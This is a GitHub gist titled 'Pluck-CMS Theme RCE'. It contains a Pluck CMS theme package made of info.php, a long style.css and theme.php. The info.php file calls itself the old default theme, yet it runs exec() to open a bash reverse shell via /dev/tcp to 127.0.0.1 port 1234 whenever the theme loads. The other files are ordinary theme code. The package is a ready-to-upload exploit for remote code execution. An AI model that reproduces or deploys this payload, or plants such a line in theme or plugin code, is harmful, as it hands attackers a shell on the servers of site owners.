Skip to content

Instantly share code, notes, and snippets.

@noobpk

noobpk/info.php

Last active August 24, 2021 11:17
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save noobpk/d499146bbc976e044f696c37d4f09e4d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save noobpk/d499146bbc976e044f696c37d4f09e4d to your computer and use it in GitHub Desktop.
Download ZIP
Pluck-CMS Theme RCE
Raw
info.php
<?php
//This is the old default theme of pluck
//Designer: Sander Thijsen, http://www.somp.nl
//You can find pluck at http://www.pluck-cms.org
exec("/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'");
$themedir = "oldstyle_exec";
$themename = "Oldstyle_exec";
$module_space[0] = "main";
$module_space[1] = "footer";
?>
Raw
style.css
body {
background-color: #E3E3E3;
font-family: Trebuchet MS;
color: #000000;
margin: 0px;
}
a:link {
color: #DD0B0B;
text-decoration: underline;
}
a:visited {
color: #DD0B0B;
text-decoration: underline;
}
a:active {
color: #DD0B0B;
text-decoration: underline;
}
a:hover {
color: #CCCCCC;
text-decoration: underline;
}
.menu a:link {
color: white;
text-decoration: underline;
}
.menu a:visited {
color: white;
text-decoration: underline;
}
.menu a:active {
color: white;
text-decoration: underline;
}
.menu a:hover {
color: #CCCCCC;
text-decoration: underline;
}
.menu li.active a {
color: black;
text-decoration: underline;
}
.menu ul {
display: inline;
margin: 0px;
padding: 0px
}
.menu li {
display: inline;
margin-right: 15px;
}
.head {
width: 750px;
background-color: white;
position: relative;
left: 50%;
margin-left: -375px; /* -(width/2) */
}
.header {
margin-bottom: 10px;
margin-left: 2%;
width: 720px;
height: 256px;
background-color: #DD0B0B;
}
.headerkop {
font-size: 50px;
color: white;
padding-top: 70px;
margin-left: 35px;
width: 580px;
}
.menu {
font-size: 15px;
color: white;
position: absolute;
top: 215px;
margin-left: 35px;
width: 600px;
}
.submenu {
float: right;
margin-left: 15px;
margin-top: 10px;
margin-right: 20px;
font-size: 11pt;
width: 180px;
}
.submenu ul {
line-height: 1.2em;
list-style: none outside none;
}
.submenu li {
border-bottom: 1px solid #D1D1D1;
padding: 5px 0;
}
.submenu a {
text-decoration: none;
}
.submenu li#active a {
color: black;
}
.content {
width: 720px;
background-color: #F2F2F2;
margin-top: 0px;
margin-left: 2%;
margin-bottom: 10px;
}
.kop {
font-size: 25px;
color: #DD0B0B;
padding-top: 20px;
padding-right: 20px;
padding-left: 20px;
}
.txt {
font-size: 14px;
padding-bottom: 20px;
padding-right: 20px;
padding-left: 20px;
}
.footer {
border-top: 1px solid #D1D1D1;
margin-top: 30px;
margin-left: 20px;
margin-right: 20px;
padding-bottom: 15px;
font-size: 12px;
text-align: right;
color: gray;
}
input {
font-family:Arial, Helvetica, sans-serif;
font-size: 10pt;
color: black;
background-color: white;
border: 1px solid black;
padding: 1pt;
margin: 5px;
}
textarea {
font-family:Arial, Helvetica, sans-serif;
font-size: 10pt;
color: black;
background-color: white;
border: 1px solid black;
padding: 1pt;
margin: 5px;
}
/* Blog */
.blog_post {
margin-top: 20px;
margin-bottom: 30px;
}
.blog_post_title {
font-size: 18px;
margin-bottom: 5px;
text-decoration: none;
}
.blog_post_title a {
text-decoration: none;
}
.blog_post_info, #blog_post_info {
font-size: 10px;
color: gray;
}
.blog_post_content, #blog_post_content {
margin-top: 5px;
}
#blog_reactions > p {
color: #DD0B0B;
font-size: 17px;
}
.blog_reaction {
border-left: 5px solid #DD0B0B;
padding-left: 10px;
margin-left: 5px;
width: 370px;
text-align: justify;
}
.blog_reaction_name {
margin-bottom: -3px;
font-size: 15px;
font-weight: bold;
}
.blog_reaction_name a {
text-decoration: none;
}
.blog_reaction_info a {
font-weight: normal;
font-size: 10px;
color: gray;
text-decoration: none;
}
.blog_reaction_message {
margin-top: 15px;
}
/* Contactform */
#contactform {
margin: 15px 0 15px 0;
}
/* Albums */
.album {
background-color: white;
border: 1px solid #DD0B0B;
border-left: 5px solid #DD0B0B;
padding: 7px;
margin: 15px auto;
}
.albuminfo {
font-size: 17pt;
}
.error {
color: red;
font-size: 14px;
}
Raw
theme.php
<?php //Make sure the file isn't accessed directly.
defined('IN_PLUCK') or exit('Access denied!'); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<?php theme_meta(); ?>
</head>
<body>
<div class="head">
<div class="header">
<div class="headerkop"><?php theme_sitetitle(); ?></div>
<div class="menu">
<?php theme_menu('ul', 'li', 'active', 0); ?>
</div>
</div>
<div class="content">
<div class="submenu">
<?php theme_menu('ul', 'li', 'active', 1, true); ?>
</div>
<div class="kop"><?php theme_pagetitle(); ?></div>
<div class="txt">
<?php theme_content(); ?>
<?php theme_area('main'); ?>
</div>
<div style="clear: both;"> </div>
<div class="footer">
<?php theme_area('footer'); ?>
>> <a href="<?php echo SITE_URL; ?>/login.php">admin</a>
<br />powered by <a href="http://www.pluck-cms.org">pluck</a>
</div>
</div>
</div>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment